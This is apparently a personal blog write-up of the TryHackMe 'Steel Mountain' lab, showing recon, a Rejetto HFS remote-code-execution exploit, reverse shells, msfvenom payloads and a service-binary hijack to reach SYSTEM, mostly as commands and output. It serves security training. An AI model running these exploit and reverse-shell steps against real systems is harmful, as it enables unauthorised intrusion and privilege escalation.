---
title: "TryHackMe - Steel Mountain Writeup"
summary: "Writeup of Steel Mountain room on TryHackMe"
categories: ["writeup"]
tags: ["tryhackme", "web", "windows"]
showSummary: true
date: 2022-12-04
draft: false
---

## Introduction
![309ed62b6afe671e007e54b9ca0d1441.png](img/309ed62b6afe671e007e54b9ca0d1441.png)

## Initial Access
Firstly, we can see that there is a file server running on port 8080.
```bash
nmap -sV 10.10.248.150                                          
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-20 16:40 CEST
Nmap scan report for 10.10.248.150
Host is up (0.041s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 8.5
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
8080/tcp  open  http               HttpFileServer httpd 2.3
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.99 seconds
```

By searching the server version on exploit-db, we found that it's a Rejetto HTTP File Server and that an RCE is possible.
![f8db056bee8ae2be1e7e544de166336e.png](img/f8db056bee8ae2be1e7e544de166336e.png)

Then, we run metasploit to get an intial shell:
```bash
msfconsole                                                                                          
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here
                                                  
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v6.2.11-dev                          ]
+ -- --=[ 2233 exploits - 1179 auxiliary - 398 post       ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Writing a custom module? After editing your 
module, why not try the reload command

msf6 > search rejetto

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec

msf6 > use exploit/windows/http/rejetto_hfs_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > set payload windows/shell
set payload windows/shell/bind_hidden_ipknock_tcp  set payload windows/shell/bind_tcp                 set payload windows/shell/reverse_tcp              set payload windows/shell/reverse_udp
set payload windows/shell/bind_hidden_tcp          set payload windows/shell/bind_tcp_rc4             set payload windows/shell/reverse_tcp_allports     set payload windows/shell_bind_tcp
set payload windows/shell/bind_ipv6_tcp            set payload windows/shell/bind_tcp_uuid            set payload windows/shell/reverse_tcp_dns          set payload windows/shell_bind_tcp_xpfw
set payload windows/shell/bind_ipv6_tcp_uuid       set payload windows/shell/reverse_ipv6_tcp         set payload windows/shell/reverse_tcp_rc4          set payload windows/shell_hidden_bind_tcp
set payload windows/shell/bind_named_pipe          set payload windows/shell/reverse_nonx_tcp         set payload windows/shell/reverse_tcp_rc4_dns      set payload windows/shell_reverse_tcp
set payload windows/shell/bind_nonx_tcp            set payload windows/shell/reverse_ord_tcp          set payload windows/shell/reverse_tcp_uuid         
msf6 exploit(windows/http/rejetto_hfs_exec) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.211.55.6      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/http/rejetto_hfs_exec) > set LHOST 10.18.6.212
LHOST => 10.18.6.212
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.10.83.158
RHOSTS => 10.10.83.158
msf6 exploit(windows/http/rejetto_hfs_exec) > set RPORT 8080
RPORT => 8080
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 10.18.6.212:4444 
[*] Using URL: http://10.18.6.212:8080/Cf3QJm6eBsO2
[*] Server started.
[*] Sending a malicious request to /
[*] Server stopped.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 10.18.6.212:4444 
[*] Using URL: http://10.18.6.212:8080/MQ6S8VDnHws
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /MQ6S8VDnHws
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.83.158
[*] Command shell session 1 opened (10.18.6.212:4444 -> 10.10.83.158:49226) at 2022-10-21 09:23:06 +0200
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\CTMsXol.vbs' on the target


Shell Banner:
Microsoft Windows [Version 6.3.9600]
-----
          

C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>
```

## Privilege Escalation
To enumerate this machine, we will use a powershell script called PowerUp, that's purpose is to evaluate a Windows machine and determine any abnormalities - "PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations."

You can download the script [here](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1).  Now you can use the upload command in Metasploit to upload the script.

But first we have to upgrade the shell to a meterpreter. To do so, we backgrounded the shell with `CTRL+Z` and then we ran a module to upgrade the shell:
```bash
msf6 exploit(windows/http/rejetto_hfs_exec) > search shell_to_meterpreter

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  post/multi/manage/shell_to_meterpreter                   normal  No     Shell to Meterpreter Upgrade


Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter                                                                      

msf6 exploit(windows/http/rejetto_hfs_exec) > use post/multi/manage/shell_to_meterpreter 
msf6 post(multi/manage/shell_to_meterpreter) > show options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the conn
                                       ection
   LHOST                     no        IP of host that will receive the connection from t
                                       he payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on

msf6 post(multi/manage/shell_to_meterpreter) > set LHOST 10.18.6.212
LHOST => 10.18.6.212
msf6 post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type               Information                   Connection
  --  ----  ----               -----------                   ----------
  1         shell x86/windows  Shell Banner: Microsoft Wind  10.18.6.212:4444 -> 10.10.83
                               ows [Version 6.3.9600] -----  .158:49226 (10.10.83.158)

msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.18.6.212:4433 
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 
[*] Sending stage (200774 bytes) to 10.10.83.158
[*] Meterpreter session 2 opened (10.18.6.212:4433 -> 10.10.83.158:49264) at 2022-10-21 09:56:03 +0200
[*] Stopping exploit/multi/handler

msf6 post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                Connection
  --  ----  ----                     -----------                ----------
  1         shell x86/windows        Shell Banner: Microsoft W  10.18.6.212:4444 -> 10.10
                                     indows [Version 6.3.9600]  .83.158:49226 (10.10.83.1
                                      -----                     58)
  2         meterpreter x64/windows  STEELMOUNTAIN\bill @ STEE  10.18.6.212:4433 -> 10.10
                                     LMOUNTAIN                  .83.158:49264 (10.10.83.1
                                                                58)
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...
```

Now we upload the PowerUp script:
```bash
meterpreter > upload Workspace/tryhackme/steel_mountain/PowerUp.ps1
[*] uploading  : /home/parallels/Workspace/tryhackme/steel_mountain/PowerUp.ps1 -> PowerUp.ps1
[*] Uploaded 586.50 KiB of 586.50 KiB (100.0%): /home/parallels/Workspace/tryhackme/steel_mountain/PowerUp.ps1 -> PowerUp.ps1
[*] uploaded   : /home/parallels/Workspace/tryhackme/steel_mountain/PowerUp.ps1 -> PowerUp.ps1
meterpreter > ls
Listing: C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
====================================================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
040777/rwxrwxrwx  0       dir   2022-10-21 09:22:59 +0200  %TEMP%
100666/rw-rw-rw-  600580  fil   2022-10-21 10:03:31 +0200  PowerUp.ps1
100666/rw-rw-rw-  174     fil   2019-09-27 13:07:07 +0200  desktop.ini
100777/rwxrwxrwx  760320  fil   2014-02-16 21:58:52 +0100  hfs.exe
```

To execute this using Meterpreter, I will type `load powershell` into meterpreter. Then I will enter powershell by entering `powershell_shell`:
```bash
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > .\PowerUp.ps1
PS > Invoke-AllChecks
AdvancedSystemCareService9
Path                  : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath        : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName             : LocalSystem
AbuseFunction         : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart            : True
Name                  : AdvancedSystemCareService9
Check                 : Unquoted Service Paths
```

The `CanRestart` option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program!

Use msfvenom to generate a reverse shell as an Windows executable.

`msfvenom -p windows/shell_reverse_tcp LHOST=10.18.6.212 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe`

Upload your binary and replace the legitimate one. Then restart the program to get a shell as root. 

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attackbox ip> LPORT=4445 -f exe -o Advanced.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: Advanced.exe
```

```bash
upload ~/steelmountain/Advanced.exe “C:\\Program Files (x86)\\IObit\\Advanced.exe”
[*] uploading : ~/steelmountain/Advanced.exe -> C:\Program Files (x86)\IObit\Advanced.exe
[*] Uploaded 7.00 KiB of 7.00 KiB (100.0%): ~/steelmountain/Advanced.exe -> C:\Program Files (x86)\IObit\Advanced.exe
[*] uploaded : ~/steelmountain/Advanced.exe -> C:\Program Files (x86)\IObit\Advanced.exe
```

Then opened up another Metasploit session to listen for the Meterpreter session phoning home:
```bash
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <attackbox ip>
LHOST => <attackbox ip>
msf6 exploit(multi/handler) > set LPORT 4445
LPORT => 4445
msf6 exploit(multi/handler) > exploit[*] Started reverse TCP handler on <attackbox ip>:4445
````

And finally, restart the `AdvancedSystemCareService9` service:
```bash
meterpreter > shell
Process 812 created.
Channel 7 created.
Microsoft Windows [Version 6.3.9600]
© 2013 Microsoft Corporation. All rights reserved.C:\Users\bill\Desktop>net stop AdvancedSystemCareService9
net stop AdvancedSystemCareService9
.
The Advanced SystemCare Service 9 service was stopped successfully.C:\Users\bill\Desktop>net start AdvancedSystemCareService9
net start AdvancedSystemCareService9
```

I got a reverse Meterpreter session and full privileges but quickly had to migrate to a more stable process:
```bash
[*] Started reverse TCP handler on <attackbox ip>:4445 
[*] Sending stage (200262 bytes) to <boot2root ip>
[*] Meterpreter session 3 opened (<attackbox ip>:4445 -> <boot2root ip>:49516 ) at [redacted] -0500[1] meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
[2] meterpreter > migrate 2068
[*] Migrating from 3292 to 2068…
[*] Migration completed successfully.
````

And I can finally search for the root flag and proceed to dump it:
```bash
meterpreter > search -f root.txt
Found 1 result…
=================Path Size (bytes)    Modified (UTC)
-----------------    --------------
c:\Users\Administrator\Desktop\root.txt 32 2019–09–27 08:41:10 -0400meterpreter > cat "c:\Users\Administrator\Desktop\root.txt"
[redacted]meterpreter >
```

##  Access and Escalation Without Metasploit 
To begin we shall be using the same CVE. However, this time let's use this [exploit](https://www.exploit-db.com/exploits/39161).

To make it work, we have to convert the exploit to python3 with `2to3`:
```bash
sudo apt install 2to3
2to3 -w exploit.py
```

*Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!*

To begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from [GitHub](https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe)!

You will need to run the exploit twice. The first time will pull our netcat binary to the system and the second will execute our payload to gain a callback!

Thirst we ran a simple http server with the netcat binary at the root path:
```bash
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

Then, we start a listener with `nc -lvp 1234`.

And finally, we ran the exploit two time:

`python3 exploit.py 10.10.83.158 8080`

The second time we can see that we obtain a shell on our listener:
```bash
nc -lvp 1234                    
listening on [any] 1234 ...
10.10.83.158: inverse host lookup failed: Unknown host
connect to [10.18.6.212] from (UNKNOWN) [10.10.83.158] 49323
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>
```

Then we download `WinPEAS` and put it at the root path of our web server to downlaod it from the attacked system:

`powershell -c wget "http://10.18.6.212/WinPEAS.exe" -outfile WinPEAS.exe`

Once we run winPeas, we see that it points us towards unquoted paths. We can see that it provides us with the name of the service it is also running.
![d4ca24d0ccfa2fa054ecaa34e8fcf03b.png](img/d4ca24d0ccfa2fa054ecaa34e8fcf03b.png)

By listing the services we can retrieve the vulnerable service:
```bash
C:\>powershell -c Get-Service
powershell -c Get-Service

Status   Name               DisplayName                           
------   ----               -----------                           
Running  AdvancedSystemC... Advanced SystemCare Service 9   
```

Finally we can reuse the previously created reverse shell and upload it in place of the service's binary:
```bash
C:\Program Files (x86)\IObit>powershell -c wget "http://10.18.6.212/Advanced.exe" -OutFile 'c:\program files (x86)\IObit\Advanced.exe'

C:\Program Files (x86)\IObit>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9 
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING 
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9 
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 2  START_PENDING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 2692
        FLAGS              : 
```

Now, we can get the flag from our new reverse shell:
```bash
listening on [any] 4445 ...
10.10.83.158: inverse host lookup failed: Unknown host
connect to [10.18.6.212] from (UNKNOWN) [10.10.83.158] 49323
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
```






